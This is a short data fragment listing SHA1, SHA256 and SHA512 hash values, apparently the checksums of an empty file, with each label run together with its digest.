SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e